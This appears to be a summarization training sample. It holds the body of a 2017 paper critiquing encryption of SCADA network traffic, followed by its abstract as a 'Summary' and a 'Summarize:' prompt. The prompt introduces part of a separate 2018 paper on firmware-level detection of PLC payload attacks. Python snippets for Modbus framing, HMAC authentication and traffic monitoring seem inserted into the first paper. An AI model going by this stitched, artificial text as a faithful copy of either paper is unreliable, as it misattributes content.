Note also that in most situations in the ICS world, one only needs to achieve authentication and integrity of the communication, and this can be done without full-fledged encryption (the latter being needed only to guarantee confidentiality). In the remainder of this paper, we first establish the setting in Sections II-IV by providing a general description of SCADA systems, their key security requirements related to encryption, and the main cryptographic protocols being considered for use as standards for SCADA systems. Next, we determine key threats by looking at recent attacks on SCADA systems in Section V. We then support each of the three conclusions above in Sections VI-VIII before providing conclusions in Section IX.
IEEE International Conference on Smart Grid Communications, 23-26 October 2017, Dresden, Germany. 978-1-5386-4055-5/17/$31.00 2017 IEEE. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply.
II. SCADA SYSTEMS OVERVIEW
In this section we introduce the basics, the architecture, and the communication strategies of SCADA systems as a basis for the security discussion in the following sections. Both ICS and SCADA systems monitor and control physical processes. A key feature of SCADA systems is that they operate over multiple geographical locations and, as such, their communication networks need to span large distances.
Fig. 1. Simplified architecture of a SCADA system
Figure 1 presents a simplified model of an industrial control system connected through a SCADA network, which is sufficient for our purposes. Several geographically distributed remote stations are interconnected with a control center.
This could be through a dedicated link or via the Internet. Each of the stations deals with a different part of a physical process, gathering data through sensors (e.g., the pressure sensor in Remote Station 2) and/or controlling the process through actuators (e.g., the valve at the same station). These end devices are monitored and controlled over a local network by Programmable Logic Controllers (PLCs) and Remote Terminal Units (RTUs). These are in turn interconnected to each other, possibly in hierarchical master/slave architectures or across remote stations, in order to coordinate the monitoring of the process.

Often industrial systems also have a dedicated control center (CC) to govern the entire process. A typical CC consists of different components, such as SCADA application servers to monitor and control the process, Human-Machine Interfaces (HMI) for operators to interact with the SCADA software, database servers with historical records, or interoperability servers (using standards such as IEC 61850 or OPC-UA, defined in IEC 62541 [6]) for interconnecting SCADA software and hardware devices from different vendors. The CC is usually physically separated from other parts of the system, and relies on a gateway/router to communicate with the remote stations.

(Icons in Fig. 1: www.vrt.com.au/downloads/vrt-network-equipment)

Originally, the connection between the CC and the remote stations was made through narrowband radio, dedicated wired links, or even satellite systems. The need for integration of services (e.g., firmware updates, remote access) has removed the tight separation between SCADA and business networks; and to standardize communications over all these different physical media, SCADA networks are moving to IP-based networking [20].
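To make the kind of IP-based SCADA messaging discussed above concrete, the sketch below builds a Modbus/TCP "read holding registers" request: a legacy fieldbus message carried in a TCP/IP wrapper. The field layout follows the public Modbus Application Protocol specification; the transaction id, unit id, and register addresses are made-up values for illustration only.

```python
import struct

def modbus_read_holding_registers(transaction_id, unit_id, start_addr, count):
    """Build a Modbus/TCP 'read holding registers' (function 0x03) request.

    The MBAP header prepended for TCP transport carries: transaction id,
    protocol id (0 for Modbus), remaining byte count, and unit id.
    """
    pdu = struct.pack(">BHH", 0x03, start_addr, count)   # function, address, quantity
    mbap = struct.pack(">HHHB", transaction_id, 0x0000, len(pdu) + 1, unit_id)
    return mbap + pdu

frame = modbus_read_holding_registers(transaction_id=1, unit_id=0x11,
                                      start_addr=0x006B, count=3)
print(frame.hex())  # 0001000000061103006b0003 -- sent in clear text over TCP port 502
```

Note that every field of this frame is visible on the wire, which is exactly the property the encryption debate in this paper is about.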
For backwards compatibility, messages are repackaged into a TCP/IP wrapper, allowing reuse of message formats and existing protocols, such as Modbus. A router/gateway at each remote station serves as the interface between IP-based networks on the outside and the fieldbus-protocol-based SCADA networks on the facility floor.

The communication between the control center and devices within remote stations can be categorized into four types [33], namely: data acquisition requests, firmware upload, control functions, and broadcast messages. These different types of messaging are usually implemented through a request/response model with clear-text messages, following a device vendor's proprietary communication protocol.

With these main ICS/SCADA network components in place, we next look at the security needs of such systems.

III. SECURITY PROPERTIES AND ENCRYPTION

Encryption is often seen as a method to improve the security of a system. However, to really evaluate the security of a system we first need to know its security requirements.

Capturing security requirements (for ICS). The security requirements for an ICS can be expressed using the classic C.I.A. triad of confidentiality, integrity, and availability, along with authenticity. These are useful to capture the security requirements for any information system. However, the priorities of the different security requirements in an ICS are inherently distinct from those of a typical IT environment.

In ICS, timely process execution (availability) is the absolute priority, especially for critical infrastructure or a core process of the production line [36]. Process availability is achieved through the sub-requirements of network availability and data correctness, which are also essential to ensure continuous monitoring of faults, anomalies, and potential threats [11]. Correctness of data sent over an untrusted network requires message authenticity, which is a combination of source authentication, i.e.,
establishing the identity or role of the sender of a message, and message integrity, i.e., assuring that data has not been altered during transmission. If the data is valuable, private, or otherwise confidential, we also need message confidentiality.

Traditionally, SCADA networks were built on the assumption that only trusted components and entities would be able to connect to them. Thus there were no confidentiality concerns, and integrity checks against faults were sufficient to also achieve message authenticity. However, nowadays SCADA networks are more accessible and may utilize untrusted networks such as the Internet, requiring enforcement and validation of message authenticity and data confidentiality.

Achieving security requirements. Different cryptographic techniques may satisfy the requirements mentioned above by concealing and/or validating communications. A common interpretation, which we follow in this paper, of the term encryption (of traffic) is that of obfuscating the content of messages, i.e., enciphering messages for confidentiality. Encrypted messages can then be read only by parties in possession of the appropriate decryption key: typically, this restricts visibility to just the endpoints of the connection.

Cryptographic techniques can be used to authenticate a party and its messages, for example through the use of public key cryptography with keys validated by digital certificates issued by trusted third parties. We will refer to any cryptographic technique and key/certificate management strategy used to achieve authenticity as an authentication scheme. Note that, depending on the cipher and the way it is applied, encryption (i.e.,
enciphering for confidentiality) may also help to check the integrity and establish the authenticity of messages; encryption and authentication may be achieved by the same cryptographic operation. However, as we are trying to clarify the reasons for using specific techniques, we will still address them as separate requirements.

IV. ENCRYPTION PROTOCOLS FOR SCADA

ICS standards suggest several protocols to achieve encryption. For example, IEC 62351 [8], for power systems infrastructure, recommends the end-to-end protocol TLS and the point-to-point protocol IPsec, while OPC-UA, for industrial automation systems, refers to the end-to-end protocol WS-Security. Here we discuss the protocols recommended by IEC 62351 and use them as examples during the discussion. However, the conclusions that we draw in this paper are not restricted to just these two schemes or to the field of power systems: since we argue in terms of general security properties, the main reasoning remains applicable to the whole field of securing SCADA networks.

According to IEC 62351, Transport Layer Security (TLS) is to be added to the most common TCP/IP industrial protocols, such as MMS, DNP3, and IEC 60870-5-104; moreover, the standard discusses the applicability of well-proven standards from the IT domain, such as IPsec.

TLS. TLS creates sessions that provide entity authentication, payload secrecy, and message integrity. It accomplishes this by setting up secure sessions using asymmetric public/private keys and digital certificates issued by trusted third-party entities known as Certificate Authorities (CAs). A Message Authentication Code (MAC) is appended to each message in a TLS connection to validate a packet's integrity and avoid replay attacks. The MAC is generated from the message's data payload and a shared secret key. Setting up a session consists of two round trips: the first authenticates the server to the client, who validates the server's digital certificate signature against a list of trusted CAs in the client's possession.
Client authentication is usually left to the application layer; see, e.g., IEC 62351 and OPC-UA. The second round trip completes the handshake by negotiating which cryptographic protocol to use, along with a corresponding unique symmetric session key. This key is used to encrypt the content of the messages exchanged during the session: since TLS works at the transport layer, it does not encrypt the routing information at the lower network layer. An external observer that intercepts a TLS-secured datagram is limited in the amount of information he can extract from it: only the endpoints of the communication, along with the type of encryption and the approximate size of the data, are revealed.

IPsec. The IPsec protocol [19] concerns the network layer and can be implemented in legacy networks as a bump-in-the-wire, i.e., without altering the endpoints. An IPsec connection is initiated in two phases, according to the Internet Key Exchange (IKE) protocol: Phase 1 has the purpose of generating the shared secret keying material to establish a secure authenticated channel between two peers. Using this channel, Phase 2 negotiates the IPsec security policies to be applied to the data flow, and encrypts the data flow using the keys from Phase 1. After the connection is over, those keys are discarded. To authenticate peers, IPsec uses pre-shared keys or digital certificates signed by a CA.

IPsec provides two extension protocols: Authentication Header (AH) [17] and Encapsulating Security Payload (ESP) [18]. AH offers data integrity and source authentication for both the IP header and the payload. As the packet's content is not encrypted, it can still be inspected by a firewall or an IDS. ESP offers data integrity, source authentication, and encryption, and is therefore more widely used in practice; note, however, that the ESP protocol is only applied to the payload and not to the IP header.
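The distinction between authenticating and encrypting traffic can be made concrete with a keyed MAC. The sketch below is a minimal illustration using Python's standard hmac module, not a description of the actual TLS or AH record formats: the message stays readable to a firewall or IDS, while its integrity and origin can still be verified by any receiver holding the key. The key and message are illustrative values.

```python
import hmac, hashlib

SHARED_KEY = b"pre-shared-demo-key"  # illustrative only; real schemes negotiate keys

def protect(message: bytes) -> bytes:
    """Append an HMAC-SHA256 tag: authenticity and integrity, no confidentiality."""
    tag = hmac.new(SHARED_KEY, message, hashlib.sha256).digest()
    return message + tag

def verify(frame: bytes) -> bytes:
    """Return the message if the tag checks out, else raise ValueError."""
    message, tag = frame[:-32], frame[-32:]
    expected = hmac.new(SHARED_KEY, message, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed")
    return message

frame = protect(b"WRITE valve_3 OPEN")
assert verify(frame) == b"WRITE valve_3 OPEN"   # payload still visible in clear text
# verify(b"WRITE valve_3 SHUT" + frame[-32:]) would raise ValueError: tag mismatch
```

The payload remains visible on the wire, so a content-based NIDS can still inspect it; only the shared key is secret. This is the "authentication without full encryption" option the paper argues usually suffices in ICS.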
IPsec is used in one of two modes, tunnel or transport, of which tunnel mode is recommended for establishing secure site-to-site communications from an untrusted network to the control network in SCADA systems [29], [34]. In either mode, the payload is encrypted (using ESP) or authenticated (using AH). In tunnel mode, headers are also protected, as the source endpoint encrypts (or authenticates) the entire packet and then encapsulates it in another IP packet. The receiving gateway then performs the unpacking, decryption (or authentication check), and internal routing necessary to transmit the packet to the final destination device on the trusted network. Tunnel mode can be gateway-to-gateway or host-to-gateway; in either case, the authentication and confidentiality provided by IPsec stop at the receiving gateway and are not fully end-to-end.

V. ATTACKS ON SCADA SYSTEMS

When checking whether a given approach indeed achieves a security goal, one needs to consider the type of attacks against which it is supposed to defend. To create a broad and representative overview of the current threats to SCADA systems, we have listed (see the first column of Table I) confirmed attacks on SCADA systems from the RISI incident database [1] and recent Verizon data breach digests [30], [31]. Note that we restrict our attention to real attacks: e.g., [36] gives a list of vulnerabilities and potential misuses, some preventable by encryption, but they do not match what is seen in practice. We describe three successful attacks in more detail, namely: Stuxnet, causing physical damage to equipment; Dragonfly, stealing intellectual property data; and BlackEnergy, disrupting a wide public infrastructure.

Stuxnet.
The Stuxnet malware attack was conducted in 2010, targeting Iranian nuclear enrichment facilities [23]. Stuxnet operated in three stages [14]. In the first stage, the initial infection was likely conducted via an infected USB flash drive from a compromised equipment vendor. Secondly, it spread locally through the SCADA network in three ways: using the normal LAN, via removable drives, and by infecting files used by Siemens PLCs. The objective of this phase was to look for computers possessing the Siemens WinCC SCADA software, typically used to program PLCs, and to establish a foothold on those machines. The third and final stage probed for PLCs connected to the WinCC system: once found, malicious code was injected to stealthily control specific centrifuges, making them operate at unsafe speeds and resulting in a higher breakdown rate [24].

Dragonfly. The Energetic Bear/Dragonfly campaign of 2011 focused on industrial espionage and intellectual property theft rather than taking control of the industrial process. It specifically targeted industrial gateways and routers used in the aviation, energy generation and distribution, pharmaceutical, and food and beverage industries [21].

The infection happened in three phases [26], [4]: initially, the attackers delivered malware through spear-phishing emails; then, they performed a watering hole attack by redirecting traffic from legitimate websites; and finally, they infected third-party applications that ICS device vendors made available online, thus compromising the supply chain. The malware then communicated with a command and control (C&C) server via HTTP, downloaded additional modules establishing persistence, and scanned the local drives, collecting information about the network layout as well as ICS and VPN configuration files and authentication credentials. It did not spread over the local network. Its final stage was to use an industrial protocol scanner to search the local network for any OPC services (see Fig.
1), or for devices and applications listening on TCP ports of common SCADA protocols. A compromised OPC service could have granted an attacker full control over the SCADA system, but the attackers made no attempt to control the ICS devices: instead, the gathered data about the SCADA network layout was sent back to the C&C server.

BlackEnergy. In late 2015, three Ukrainian power distribution utilities suffered a coordinated attack that caused a blackout for several hours [32]. The attack was conducted in two main stages, separated by months [12]: first, the attackers used phishing emails to penetrate the utilities' IT networks and plant the BlackEnergy 3 malware. The malware connected to its C&C server, moved horizontally, and harvested credentials to gain VPN tunnelling access to the SCADA network; once there, it completed the initial reconnaissance by discovering the serial-to-ethernet field devices used by the remote stations to decode commands from the command center. Six months later, the attackers used the malware to take control of the SCADA workstations and HMI, locking out operators and manually issuing commands to open the remote stations' breakers, thus causing the blackout. At the same time, they deployed malicious custom firmware on the gateway devices, disabling them and preventing recovery.

VI. WHERE ENCRYPTION FAILS

With basic definitions and a description of key attacks in place, we can now evaluate our first thesis: encryption often does not yield extra SCADA security. To this end we consider the impact of encryption on the attacks described above.

Stuxnet. Recall that Stuxnet comprises three stages. The first stage, i.e., the initial infection through a compromised USB drive, did not involve network communication. In the second and third stages, Stuxnet first spread on the LAN and then infected WinCC database servers; the infected WinCC systems then uploaded control code to the PLCs, as they were authorized to do. However, this code had malicious content.
In both stages, all communications were between valid parties that trusted each other. The endpoint vulnerabilities exploited in the second stage to spread Stuxnet, and the malicious content transmitted to the PLCs during the third stage, did not affect the proper establishment of the connections. As such, encryption would not have impeded the attack at all.

Dragonfly. The Dragonfly campaign used standard business-level malware techniques, focused on the target's corporate network [21]. Once there, the malware gathered locally stored authentication credentials that enabled authorized access to other remote industrial systems. In around 5% of the infections, the malware included a module to capture credentials sent over unencrypted HTTP traffic from a browser [4], [3]. Also, the attackers tried to discover and probe OPC services on LAN hosts by using the valid interfaces that were already present on the infected machines. The situation was the same as with Stuxnet, in that the attackers exploited vulnerabilities on the endpoints, while all the communication on the network was between valid parties. Only in some rare cases would encryption have hindered a small portion of the information gathering performed by the malware.

BlackEnergy. The attackers infiltrated a business workstation through email, spread their malware on the LAN, and then harvested credentials to gain legitimate and authorized access to the SCADA network, bypassing the security at the gateways of the remote stations. Using existing remote administration tools, the attackers used native connections and commands [12] to discover the ICS devices on the remote stations' local networks; to upload the custom malicious firmware to the gateways; and to control the breakers through a panel. All these malicious actions compromised endpoints rather than connections, and therefore would not have been impacted by encrypting SCADA traffic.
As stated before, encrypting a communication channel protects the confidentiality of a message during its transmission. This is relevant in the case where potential attackers reside along the transmission path of the message, either intercepting it as a man-in-the-middle or just passively listening to it. On the other hand, if the attackers compromise a communication endpoint, as happened in our examples, it is easy to obtain the keys and configuration files needed to establish valid connections to other devices in the SCADA network, and to pivot the attack to those.

TABLE I. ANALYSIS OF RECENT SCADA INCIDENTS

Brief Description | Encr. | Net Mon. | Year | Industry
Stuxnet malware targets uranium enrichment facility [1], [14] | X | O f,c [24] | 2010 | Power/utility
Russian-based Dragonfly group attacks energy industry [1], [4] | X | O f,c [22] | 2014 | Power/utility
Cyber-attack against Ukrainian critical infrastructure [1], [12] | X | O f,c [32] | 2016 | Power/utility
Malware on manufacturing OT network [31] | x | O f,c [31] | 2017 | Manufacturing
Hacktivists control PLCs of Kemuri Water Company [30] | x | o c | 2016 | Water treatment
Public utility compromised after brute-force hack attack [1] | x | o f,c | 2014 | Power/utility
U.S. power plant infected with malware from USB [1] | x | ? | 2012 | Power/utility
U.S. electric utility Mariposa virus infection [1], [16] | x | O f,c [16] | 2012 | Power/utility
Disk-wiping Shamoon virus knocks out computers at Qatari gas firm RasGas [1] | x | ? | 2012 | Petroleum
Gas company virus infection from USB [1] | x | ? | 2012 | Petroleum
Auto manufacturer suffers data breach from virus [1] | ? | ? | 2012 | Automotive
Process control network infected with a virus from laptop [1] | x | ? | 2012 | Petroleum
Industrial control system hacked using backdoor posted online [1], [15] | x | o f,c | 2012 | Other
South Houston water treatment plant hack [1] | x | ? | 2011 | Water/waste
Steel plant infected with Conficker worm [1] | x | o f,c | 2011 | Metals
Brute-force attack on Texas electricity provider [1] | x | o f | 2010 | Power/utility

The second column of Table I summarizes the evaluation of the different attacks. For the three attacks studied in detail, encryption did not help (indicated by "X" in the table). The same conclusion can be reached for the others, based on a general description of the attack (indicated by "x"). In one case (indicated by "?") we did not have enough information on the attack to evaluate whether encryption would have helped. The table clearly validates our first thesis: encryption is not able to stop most of these attacks.

VII. THREATS OF ENCRYPTION TO SECURITY

In this section we evaluate our second thesis: encryption can have negative consequences for security. Encryption decreases the visibility of data, not only for potential attackers, but also for security tools trying to evaluate this data, such as network monitoring solutions. With respect to monitoring we distinguish two main categories: flow-based solutions, e.g., [28], that only consider the amounts of communication and the endpoints involved, and content-based solutions, e.g., [13], [35], that also consider the actual content of the communications. Flow-based solutions may still work if the communication is encrypted, but this depends on the exact approach and the method of encryption. IPsec tunnel mode, for example, would prevent (some forms of) flow-based analysis on the link it is applied to. Clearly, content-based solutions would be prevented from fully analysing data that is encrypted with keys the monitoring system does not have.
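To make concrete what a content-based monitor loses under encryption, here is a minimal sketch of a content-based check on clear-text Modbus/TCP frames: it flags write commands (which change process state) arriving from hosts outside an allow-list. The function codes come from the public Modbus specification; the allow-list address and the frame are illustrative assumptions. If the payload were encrypted, the function-code test below would be impossible for the monitor.

```python
# Modbus function codes that modify process state (per the public Modbus spec)
WRITE_CODES = {0x05, 0x06, 0x0F, 0x10}
ALLOWED_WRITERS = {"10.0.0.5"}  # illustrative allow-list: the engineering workstation

def inspect(src_ip: str, frame: bytes) -> str:
    """Content-based check on a clear-text Modbus/TCP frame.

    Byte 7 of a Modbus/TCP frame (right after the 7-byte MBAP header) is
    the function code -- exactly the field encryption would hide.
    """
    if len(frame) < 8:
        return "malformed"
    function_code = frame[7]
    if function_code in WRITE_CODES and src_ip not in ALLOWED_WRITERS:
        return "alert: write command from unauthorized host"
    return "ok"

# A 'write single coil' (0x05) request, first from an unknown host, then from
# the allowed engineering workstation:
frame = bytes.fromhex("000100000006110500010000")
print(inspect("10.0.0.99", frame))  # alert: write command from unauthorized host
print(inspect("10.0.0.5", frame))   # ok
```

A flow-based monitor would see only the two endpoints and the frame size here; the distinction between a read and a write is content.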
In the third column of Table I we indicate whether the attacks could have been detected by network monitoring, distinguishing between cases (marked "O") where detection is certainly possible, as reported by the indicated publications, and cases (marked "o") where we believe detection should be possible based on a high-level evaluation of the attack. All three attacks discussed in Section V could have been detected by an appropriate network monitoring solution. We further indicate whether flow-based (f) and content-based (c) monitoring is involved. Several attacks (marked f,c) can be detected by flow-based monitoring but require content-based approaches to identify what type of attack is happening.

We have several cases where we did not find any claims that the attack is detectable with a given approach, and the attack descriptions are not sufficient to determine whether known approaches would work. As such, several cases are indicated as unknown (?). Still, several attacks require content-based approaches to identify, or even to detect, them at all. This already validates our second thesis: in many cases encryption hinders other security solutions and thus may actually decrease the security of the system.

VIII. THREATS OF ENCRYPTION TO SYSTEM OPERATIONS

In this section we evaluate our third thesis: encryption increases troubleshooting and recovery costs. To this end we consider several causes that can motivate troubleshooting.

Network congestion. Upon slow operator terminal updates, one would check the LAN for overload [9, Sec. 8.2]. Quoting from [31]: "over the past few months, the network seemed sluggish, which the automation engineers and SMEs attributed to older, legacy equipment. [...] With the cooperation of [company], we set up a Switched Port Analyzer (SPAN) port and deployed a passive network analyzer to collect and analyze the traffic." If the traffic was encrypted, this common troubleshooting task would have been hindered.
A possible cause for congestion is a device flooding the network, e.g., due to misconfiguration or a virus attack. An example of the latter was the Conficker worm infecting a steel plant in 2011 [1]: the virus flooded the network with unwanted packets and caused an instability in the communications between PLCs and supervisory stations, freezing most of the supervisory systems. While the presence of the flaw is clear, a full diagnosis requires looking at the content of the communication, and possibly listening from different locations, to identify the source of the anomalous traffic.

Non-healthy devices. Upon missing updates, alarms, or unexpected behaviour, one would evaluate the health of the related components. After basic (hardware) checks, [9, Sec. 6.10] recommends checking an individual component's health by using a protocol analyser to look for errors or inconsistencies in its traffic. Components failing health tests should be readily replaced: "An effective SCADA system should include the proper complement of spare components that the operator can swap out easily for troubleshooting purposes."² The lower visibility of data induced by encryption can negatively affect these health checks, and key management issues can impact the prompt replacement of components.

Third-party network access. A common SCADA practice is to hire an external party to evaluate the system, either as part of a health check or risk assessment [31], or for emergency troubleshooting. As part of this, the external party would plug a (possibly unauthenticated) external device (a laptop) in at different points of the communication network, and evaluate the systems and communication visible there.
As even authenticated devices do not normally get the decryption keys for sessions between other devices, encryption might hinder this practice by limiting what communications are visible to the external device.

The examples above show that encryption increases troubleshooting complexity by making analysing problems and replacing components more involved. The exact impact may differ per scenario; a more formal general statement would require going into common SCADA troubleshooting and recovery practices in detail. Still, we believe the issues observed above are representative and confirm our thesis that encryption increases troubleshooting and recovery costs.

IX. CONCLUSIONS

This paper is meant as a critical analysis of the pros and cons of network encryption for ICS. We observed three general principles. First, in the majority of cases, the introduction of encryption does not yield extra security. Second, encryption can actually have negative consequences for security by hindering other security mechanisms such as NIDS. Third, encryption can raise the costs of troubleshooting and recovery considerably. Of course, before drawing conclusions one has to consider the criticality of the target ICS, as well as its specific requirements: for example, systems dealing with user data, such as advanced metering infrastructures (AMI), will need stronger confidentiality. Currently, though, in typical ICS scenarios one needs to achieve authentication and integrity of the communication (whose implementation is easier and has less impact on the general system), rather than the confidentiality offered by encryption. We cannot predict any new attacks or future changes to the threat landscape that might change this priority.

We do not advocate completely discarding encryption for ICS network traffic, but assert that blanket use of encryption on SCADA networks can prove both costly and detrimental to security.
Instead, careful consideration of what encryption is actually good for, and at what cost, is needed both for standardization efforts and for SCADA system deployment.

² www.tpomag.com/online exclusives/2013/07/scada troubleshooting tips help systems runsmoothly

REFERENCES
[1] RISI Online Incident Database. http://www.risidata.com/Database.
[2] APT1: Exposing One of China's Cyber Espionage Units. Technical report, Mandiant, 2013.
[3] Cyberespionage attacks against energy suppliers, version 1.21. Technical report, Symantec, 2014.
[4] Energetic Bear - Crouching Yeti. Technical report, Kaspersky, 2014.
[5] Annual Threat Report. Technical report, Dell, 2015.
[6] IEC 62541: OPC Unified Architecture. International Electrotechnical Commission, 2015.
[7] Year in Review. Technical report, NCCIC/ICS-CERT, 2015.
[8] IEC 62351 (2016-09): Power systems management and associated information exchange - Data and communications security. International Electrotechnical Commission, 2016.
[9] David Bailey and Edwin Wright. Practical SCADA for Industry. Newnes, 2003.
[10] Stewart Baker, Shaun Waterman, and George Ivanov. In the Crossfire. Technical report, McAfee, 2010.
[11] Manuel Cheminod, Luca Durante, and Adriano Valenzano. Review of security issues in industrial networks. IEEE Transactions on Industrial Informatics, 9(1):277-293, 2013.
[12] Tim Conway, Robert M. Lee, and Michael J. Assante. Analysis of the cyber attack on the Ukrainian power grid. Defense use case. Technical report, SANS ICS, 2016.
[13] E. Costante, J. I. den Hartog, M. Petkovic, S. Etalle, and M. Pechenizkiy. Hunting the unknown - white-box database leakage detection. In DBSEC, LNCS 8566, pages 243-259, 2014.
[14] Nicolas Falliere, Liam O'Murchu, and Eric Chien. W32.Stuxnet dossier. White paper, Symantec Corp., Security Response, 5(6), 2011.
[15] FBI. Vulnerabilities in Tridium Niagara Framework Result in Unauthorized Access to a New Jersey Company's ICS, 2012.
[16] ICS-CERT.
Advisory ICSA-10-090-01: Mariposa Botnet, 2010.
[17] S. Kent. IP Authentication Header. RFC 4302, 2005.
[18] S. Kent. IP Encapsulating Security Payload (ESP). RFC 4303, 2005.
[19] S. Kent and K. Seo. Security Architecture for the Internet Protocol. RFC 4301, 2005.
[20] HyungJun Kim. Security and vulnerability of SCADA systems over IP-based wireless sensor networks. International Journal of Distributed Sensor Networks, 2012.
[21] Joel Langill. Defending Against the Dragonfly Cyber Security Attacks. Technical report, Belden, 2014.
[22] Joel Langill, Emmanuele Zambon, and Daniel Trivellato. Cyberespionage campaign hits energy companies. Technical report, Security Matters, 2014.
[23] Ralph Langner. Stuxnet: Dissecting a cyberwarfare weapon. IEEE Security & Privacy, 9(3):49-51, 2011.
[24] Ralph Langner. To Kill a Centrifuge. Technical report, Langner Group, 2013.
[25] David McMillen. Security attacks on industrial control systems. Technical report, IBM, 2017.
[26] Nell Nelson. The Impact of Dragonfly Malware on Industrial Control Systems. Technical report, SANS ICS, 2016.
[27] Adam Slagell. Thinking critically about computer security trade-offs. Skeptical Inquirer, 2016.
[28] A. Sperotto, G. Schaffrath, R. Sadre, C. Morariu, A. Pras, and B. Stiller. An overview of IP flow-based intrusion detection. IEEE Communications Surveys and Tutorials, 12(3):343-356, 2010.
[29] Keith Stouffer, Suzanne Lightman, Victoria Pillitteri, Marshall Abrams, and Adam Hahn. Guide to industrial control systems (ICS) security, volume 800. NIST, 2014.
[30] Verizon RISK Team. Data breach digest, 2016.
[31] Verizon RISK Team. Data breach digest, 2017.
[32] Daniel Trivellato and Dennis Murphy. Lights out! Who's next? Technical report, Security Matters, 2016.
[33] Yongge Wang. sSCADA: securing SCADA infrastructure communications. Int. J. Communication Networks and Distributed Systems, 6(1):59, 2011.
[34] Wonderware Invensys Systems. Securing Industrial Control Systems, 1.4 edition, 2007.
[35] Omer Yuksel, Jerry den Hartog, and Sandro Etalle. Towards useful anomaly detection for back office networks. In ICISS, LNCS 10063, pages 509-520. Springer International Publishing, 2016.
[36] Bonnie Zhu, Anthony Joseph, and Shankar Sastry. A taxonomy of cyber attacks on SCADA systems. In iThings/CPSCom, pages 380-388. IEEE, 2011.
Summary:
Nowadays, the internal network communication of Industrial Control Systems (ICS) usually takes place in unencrypted form. This, however, seems bound to change in the future: as we write, encryption of network traffic is seriously being considered as a standard for future ICS. In this paper we take a critical look at the pros and cons of traffic encryption in ICS. We come to the conclusion that encrypting this kind of network traffic may actually result in a reduction of security and overall safety. As such, sensible versus non-sensible use of encryption needs to be carefully considered both in developing ICS standards and systems.
Summarize:
I. INTRODUCTION

In industrial control systems (ICS), programmable logic controllers (PLCs) play a critical role in process automation. As cyber attacks targeting ICS increase in sophistication, field devices such as PLCs are of particular concern because they directly monitor and control physical processes. As shown in Figure 1, PLCs are typically deployed close to sensors and actuators, implementing local control actions (i.e., regulatory control). In addition to utilizing sensor data and controlling actuators locally, PLCs transmit real-time process data to operator workstations and execute their commands, facilitating the realization of supervisory control.

Due to the unique and vital role of PLCs in critical ICS infrastructure [1], they are one of the major targets of cyber attacks. For example, the Stuxnet attack managed to silently sabotage centrifuges in a uranium-enrichment plant by reading and writing code blocks on PLCs from a compromised engineering workstation [2], [3]. By modifying a PLC's control program, severe damage (e.g., data loss, interruption of system operation, and destruction of ICS equipment) can be induced by attackers. In [4], it is shown that malicious code can easily be slipped into PLC control programs and evade the scrutiny of relay engineers from both academia and industry. Therefore, it is crucial to devise automated detection methods against cyber attacks launched through a modified PLC control program.

Fig. 1. Architecture of industrial control systems and the role of PLCs (engineering workstation, operator workstation (HMI), and corporate network connected over the control network to a PLC interfacing with the sensors and actuators of the physical infrastructure).
As PLCs are special-purpose computers interfacing with various sensors/actuators and providing firmware support to run control programs (also known as payload programs [5], [6]) that emulate the behaviors of an electric ladder diagram [7], [1], attacks on PLCs can be launched by modifying or overwriting the PLC payload program. Such attacks are known as PLC payload attacks. A PLC control program is typically written by a team of PLC engineers using the suite of programming languages specified in IEC 61131-3 [8]. Such a control program is regarded as the payload of a PLC's firmware, which controls access to hardware resources (e.g., inputs, outputs, and timers) and repeatedly loops through the payload instructions. An attacker with PLC access (e.g., by gaining control of an engineering workstation running PLC development and monitoring software) can download a malicious payload and gain full control over its sensors and actuators. In the Stuxnet attack, a component of Stuxnet is capable of launching payload attacks on PLCs by first infecting an engineering workstation and then downloading malicious code blocks [3]. Payload attacks can also be carried out by an insider (e.g., a disgruntled employee) with the help of tools such as SABOT [5], which generates malicious payload based on adversary-provided specifications. Since legitimate payload relies on PLC programming instructions implemented by the firmware to carry out control and monitoring tasks, a malicious payload program can execute any combination of these instructions to sabotage the physical process. In this paper, we introduce runtime behavior monitoring into PLC firmware to detect payload attacks and protect ICS from severe physical damage.
Based on control system specifications provided by control system engineers, we establish a runtime behavior profile of the normal/legitimate payload program in terms of I/O access patterns, network access patterns, as well as payload program timing characteristics. When a newly updated payload program is downloaded into a PLC (either by an attacker or by a trusted control system engineer), its runtime behavior data is collected by the PLC firmware. When abnormal behaviors are observed by the firmware, execution of the payload program is terminated so that abnormal control signals will not be sent to actuators. The contributions of our work are as follows: We introduce runtime behavior monitoring into PLC firmware to enable automated detection of PLC payload attacks. In contrast to existing detection methods based on linear temporal logic, our proposed approach can identify attacks that violate real-time requirements of an ICS and does not require the introduction of a bump-in-the-wire apparatus between engineering workstation and PLCs. We present a proof-of-concept implementation of the firmware-level payload attack detection scheme on ARM Cortex-M4F microcontrollers. Our evaluation results show that the proposed approach can detect a wide variety of payload attacks revealed by prior research [4] and reported cyber-security incidents. Furthermore, we evaluate the overhead of implementing the proposed detection method and find that it is feasible to incorporate our scheme on microcontrollers used by existing PLCs to detect payload attacks.

[2018 IEEE Conference on Communications and Network Security (CNS), 978-1-5386-4586-4/18/$31.00 © 2018 IEEE]

II. RELATED WORK

A.
Programmable Logic Controller (PLC) and Payload Program Execution Model

A programmable logic controller (PLC) is a special-purpose computer designed to replace relay panels and control a physical process [7]. Figure 2 presents the general hardware and software architecture of PLCs.

[Fig. 2. General PLC hardware and software architecture.]

There are several important characteristics that distinguish PLCs from personal computers [9]: PLCs are designed to operate in harsh industrial environments and are programmed in relay ladder logic or other PLC programming languages [8]. In addition, a PLC executes a simple payload program in a sequential fashion. Once deployed in an ICS, a PLC continuously collects readings from sensors connected to its inputs, runs the PLC payload program, and generates outputs that control the physical process. As shown in Fig. 1, a PLC control program can be developed on engineering workstations using programming software that supports ladder logic or other PLC programming languages and downloaded to the target PLC for execution. The operator of an ICS may monitor and control the physical process via a human-machine interface (HMI), which communicates with PLCs to receive real-time process data and issue control commands. To control and monitor the physical process, a PLC's firmware implements input and output image tables as well as a program scan cycle [7], [9]. A program scan cycle consists of input scan, program scan, output scan, and housekeeping phases, which are shown in Fig. 3. After system start-up, a PLC repeatedly walks through the four phases of the program scan cycle as follows: First, in the input scan phase, the PLC firmware samples the I/O pin values and writes them into the input image table.
Then, in the program scan phase, instructions in the payload program are executed one by one using values stored in the input image table. Output values are generated during this phase and written into the output image table. Next, in the output scan phase, values in the output image table are transferred to the external output terminals, making control actions specified in the payload program take effect. Finally, in the housekeeping phase, internal checks on memory and system operation are performed. Additionally, communication requests originated from other hosts (e.g., the HMI) or generated by the payload program itself are also serviced before the next program scan cycle starts.

